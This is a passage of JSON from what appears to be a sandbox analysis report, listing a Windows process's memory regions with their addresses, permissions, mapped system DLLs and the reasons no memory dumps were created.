"start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_2593", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:04:52.346", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 0, "filename": null, "id": "region_2726", "name": "private_0x0000000000210000", "norm_filename": null, "region_type": "private_memory", "start_va": 2162688, "timestamp": "00:04:53.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1950154752, "type": "region", "version": 1 }, "end_va": 1950187519, "entry_point": 1950154752, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_2727", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1950154752, "timestamp": "00:04:53.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1950220288, "type": "region", "version": 1 }, "end_va": 1950597119, "entry_point": 1950220288, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_2728", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1950220288, "timestamp": "00:04:53.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1950613504, "type": "region", "version": 1 }, "end_va": 1950871551, "entry_point": 1950613504, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_2729", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1950613504, "timestamp": "00:04:53.617", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 3145728, "type": "region", "version": 1 }, "end_va": 4194303, "entry_point": 0, "filename": null, "id": "region_2730", "name": "private_0x0000000000300000", "norm_filename": null, "region_type": "private_memory", "start_va": 3145728, "timestamp": "00:04:53.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1973157888, "type": "region", "version": 1 }, "end_va": 1974271999, "entry_point": 1973157888, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_2731", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1973157888, "timestamp": "00:04:53.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1986265088, "type": "region", "version": 1 }, "end_va": 1986551807, "entry_point": 1986265088, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_2732", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1986265088, "timestamp": "00:04:53.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2005598208, "type": "region", "version": 1 }, "end_va": 2006622207, "entry_point": 0, "filename": null, "id": "region_2733", "name": "private_0x00000000778b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2005598208, "timestamp": "00:04:53.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2006646784, "type": "region", "version": 1 }, "end_va": 2007822335, "entry_point": 0, "filename": null, "id": "region_2734", "name": "private_0x00000000779b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2006646784, "timestamp": "00:04:53.624", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_2735", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 1703936, "type": "region", "version": 1 }, "end_va": 2125823, "entry_point": 1703936, "filename": "\\Windows\\System32\\locale.nls", "id": "region_2736", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 1703936, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1388544, "start_va": 1922301952, "type": "region", "version": 1 }, "end_va": 1923690495, "entry_point": 1922301952, "filename": "\\Windows\\SysWOW64\\msvbvm60.dll", "id": "region_2737", "name": "msvbvm60.dll", "norm_filename": "c:\\windows\\syswow64\\msvbvm60.dll", "region_type": "memory_mapped_file", "start_va": 1922301952, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1971322880, "type": "region", "version": 1 }, "end_va": 1971372031, "entry_point": 1971322880, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_2738", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1971322880, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1971388416, "type": "region", "version": 1 }, "end_va": 1971781631, "entry_point": 1971388416, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_2739", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1971388416, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1972109312, "type": "region", "version": 1 }, "end_va": 1973157887, "entry_point": 1972109312, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_2740", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1972109312, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1974337536, "type": "region", "version": 1 }, "end_va": 1975762943, "entry_point": 1974337536, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_2741", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1974337536, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1978073088, "type": "region", "version": 1 }, "end_va": 1978777599, "entry_point": 1978073088, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_2742", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1978073088, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1980825600, "type": "region", "version": 1 }, "end_va": 1981468671, "entry_point": 1980825600, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_2743", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1980825600, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1981480960, "type": "region", "version": 1 }, "end_va": 1982066687, "entry_point": 1981480960, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_2744", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1981480960, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1987903488, "type": "region", "version": 1 }, "end_va": 1988005887, "entry_point": 1987903488, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_2745", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1987903488, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1988100096, "type": "region", "version": 1 }, "end_va": 1989083135, "entry_point": 1988100096, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_2746", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1988100096, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1989083136, "type": "region", "version": 1 }, "end_va": 1989124095, "entry_point": 1989083136, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_2747", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1989083136, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 1989476352, "type": "region", "version": 1 }, "end_va": 1990066175, "entry_point": 1989476352, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_2748", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 1989476352, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 2004090880, "type": "region", "version": 1 }, "end_va": 2004746239, "entry_point": 2004090880, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_2749", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 2004090880, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_2750", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_2751", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:04:53.653", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 5308416, "type": "region", "version": 1 }, "end_va": 5373951, "entry_point": 0, "filename": null, "id": "region_2752", "name": "private_0x0000000000510000", "norm_filename": null, "region_type": "private_memory", "start_va": 5308416, "timestamp": "00:04:53.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 5373952, "type": "region", "version": 1 }, "end_va": 6979583, "entry_point": 0, "filename": null, "id": "region_2753", "name": "pagefile_0x0000000000520000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5373952, "timestamp": "00:04:53.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1980432384, "type": "region", "version": 1 }, "end_va": 1980825599, "entry_point": 1980432384, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_2754", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1980432384, "timestamp": "00:04:53.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1985413120, "type": "region", "version": 1 }, "end_va": 1986248703, "entry_point": 1985413120, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_2755", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1985413120, "timestamp": "00:04:53.658", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 135167, "entry_point": 0, "filename": null, "id": "region_2756", "name": "private_0x0000000000020000", "norm_filename": null, "region_type": "private_memory", "start_va": 131072, "timestamp": "00:04:53.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 200703, "entry_point": 0, "filename": null, "id": "region_2757", "name": "private_0x0000000000030000", "norm_filename": null, "region_type": "private_memory", "start_va": 196608, "timestamp": "00:04:53.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 7012352, "type": "region", "version": 1 }, "end_va": 8589311, "entry_point": 0, "filename": null, "id": "region_2758", "name": "pagefile_0x00000000006b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7012352, "timestamp": "00:04:53.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 8650752, "type": "region", "version": 1 }, "end_va": 29622271, "entry_point": 0, "filename": null, "id": "region_2759", "name": "pagefile_0x0000000000840000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8650752, "timestamp": "00:04:53.668", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_2760", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:04:53.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4194304, "start_va": 30670848, "type": "region", "version": 1 }, "end_va": 34865151, "entry_point": 0, "filename": null, "id": "region_2761", "name": "private_0x0000000001d40000", "norm_filename": null, "region_type": "private_memory", "start_va": 30670848, "timestamp": "00:04:53.669", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 34865152, "type": "region", "version": 1 }, "end_va": 37810175, "entry_point": 34865152, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_2762", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 34865152, "timestamp": "00:04:53.674", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 917504, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_2763", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:04:53.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 30605312, "type": "region", "version": 1 }, "end_va": 30670847, "entry_point": 0, "filename": null, "id": "region_2764", "name": "private_0x0000000001d30000", "norm_filename": null, "region_type": "private_memory", "start_va": 30605312, "timestamp": "00:04:53.683", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 720896, "start_va": 4456448, "type": "region", "version": 1 }, "end_va": 5177343, "entry_point": 0, "filename": null, "id": "region_2765", "name": "private_0x0000000000440000", "norm_filename": null, "region_type": "private_memory", "start_va": 4456448, "timestamp": "00:04:53.690", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 524288, "start_va": 1947926528, "type": "region", "version": 1 }, "end_va": 1948450815, "entry_point": 1947926528, "filename": "\\Windows\\SysWOW64\\uxtheme.dll", "id": "region_2766", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\syswow64\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1947926528, "timestamp": "00:04:53.699", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 2293760, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 40108031, "entry_point": 0, "filename": null, "id": "region_2767", "name": "private_0x0000000002410000", "norm_filename": null, "region_type": "private_memory", "start_va": 37814272, "timestamp": "00:04:53.700", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 37814272, "type": "region", "version": 1 }, "end_va": 38727679, "entry_point": 0, "filename": null, "id": "region_2768", "name": "pagefile_0x0000000002410000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 37814272, "timestamp": "00:04:54.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 39845888, "type": "region", "version": 1 }, "end_va": 40108031, "entry_point": 0, "filename": null, "id": "region_2769", "name": "private_0x0000000002600000", "norm_filename": null, "region_type": "private_memory", "start_va": 39845888, "timestamp": "00:04:54.889", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 458752, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_2770", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:04:54.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_2771", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:04:54.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 3080192, "type": "region", "version": 1 }, "end_va": 3145727, "entry_point": 0, "filename": null, "id": "region_2772", "name": "private_0x00000000002f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 3080192, "timestamp": "00:04:54.892", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 389120, "start_va": 1946222592, "type": "region", "version": 1 }, "end_va": 1946611711, "entry_point": 1946222592, "filename": "\\Windows\\SysWOW64\\sxs.dll", "id": "region_2773", "name": "sxs.dll", "norm_filename": "c:\\windows\\syswow64\\sxs.dll", "region_type": "memory_mapped_file", "start_va": 1946222592, "timestamp": "00:04:54.902", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 77824, "start_va": 1947402240, "type": "region", "version": 1 }, "end_va": 1947480063, "entry_point": 1947402240, "filename": "\\Windows\\SysWOW64\\dwmapi.dll", "id": "region_2774", "name": "dwmapi.dll", "norm_filename": "c:\\windows\\syswow64\\dwmapi.dll", "region_type": "memory_mapped_file", "start_va": 1947402240, "timestamp": "00:04:57.960", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2781183, "entry_point": 0, "filename": null, "id": "region_2775", "name": "pagefile_0x00000000002a0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2752512, "timestamp": "00:04:59.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2826239, "entry_point": 0, "filename": null, "id": "region_2776", "name": "pagefile_0x00000000002b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2818048, "timestamp": "00:04:59.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 40108032, "type": "region", "version": 1 }, "end_va": 44249087, "entry_point": 0, "filename": null, "id": "region_2777", "name": "pagefile_0x0000000002640000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 40108032, "timestamp": "00:04:59.455", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 9633792, "start_va": 44302336, "type": "region", "version": 1 }, "end_va": 53936127, "entry_point": 44302336, "filename": "\\Windows\\Fonts\\StaticCache.dat", "id": "region_2778", "name": "staticcache.dat", "norm_filename": "c:\\windows\\fonts\\staticcache.dat", "region_type": "memory_mapped_file", "start_va": 44302336, "timestamp": "00:04:59.456", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 29622272, "type": "region", "version": 1 }, "end_va": 30146559, "entry_point": 0, "filename": null, "id": "region_2779", "name": "private_0x0000000001c40000", "norm_filename": null, "region_type": "private_memory", "start_va": 29622272, "timestamp": "00:05:00.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 30277632, "type": "region", "version": 1 }, "end_va": 30539775, "entry_point": 0, "filename": null, "id": "region_2780", "name": "private_0x0000000001ce0000", "norm_filename": null, "region_type": "private_memory", "start_va": 30277632, "timestamp": "00:05:00.522", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1990656000, "type": "region", "version": 1 }, "end_va": 2003542015, "entry_point": 1990656000, "filename": "\\Windows\\SysWOW64\\shell32.dll", "id": "region_2781", "name": "shell32.dll", "norm_filename": "c:\\windows\\syswow64\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1990656000, "timestamp": "00:05:03.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1983315968, "type": "region", "version": 1 }, "end_va": 1983672319, "entry_point": 1983315968, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_2782", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1983315968, "timestamp": "00:05:03.646", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 114688, "start_va": 1970077696, "type": "region", "version": 1 }, "end_va": 1970192383, "entry_point": 1970077696, "filename": "\\Windows\\SysWOW64\\IPHLPAPI.DLL", "id": "region_2783", "name": "iphlpapi.dll", "norm_filename": "c:\\windows\\syswow64\\iphlpapi.dll", "region_type": "memory_mapped_file", "start_va": 1970077696, "timestamp": "00:05:12.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 24576, "start_va": 1988034560, "type": "region", "version": 1 }, "end_va": 1988059135, "entry_point": 1988034560, "filename": "\\Windows\\SysWOW64\\nsi.dll", "id": "region_2784", "name": "nsi.dll", "norm_filename": "c:\\windows\\syswow64\\nsi.dll", "region_type": "memory_mapped_file", "start_va": 1988034560, "timestamp": "00:05:12.730", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 28672, "start_va": 1970012160, "type": "region", "version": 1 }, "end_va": 1970040831, "entry_point": 1970012160, "filename": "\\Windows\\SysWOW64\\winnsi.dll", "id": "region_2785", "name": "winnsi.dll", "norm_filename": "c:\\windows\\syswow64\\winnsi.dll", "region_type": "memory_mapped_file", "start_va": 1970012160, "timestamp": "00:05:12.733", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 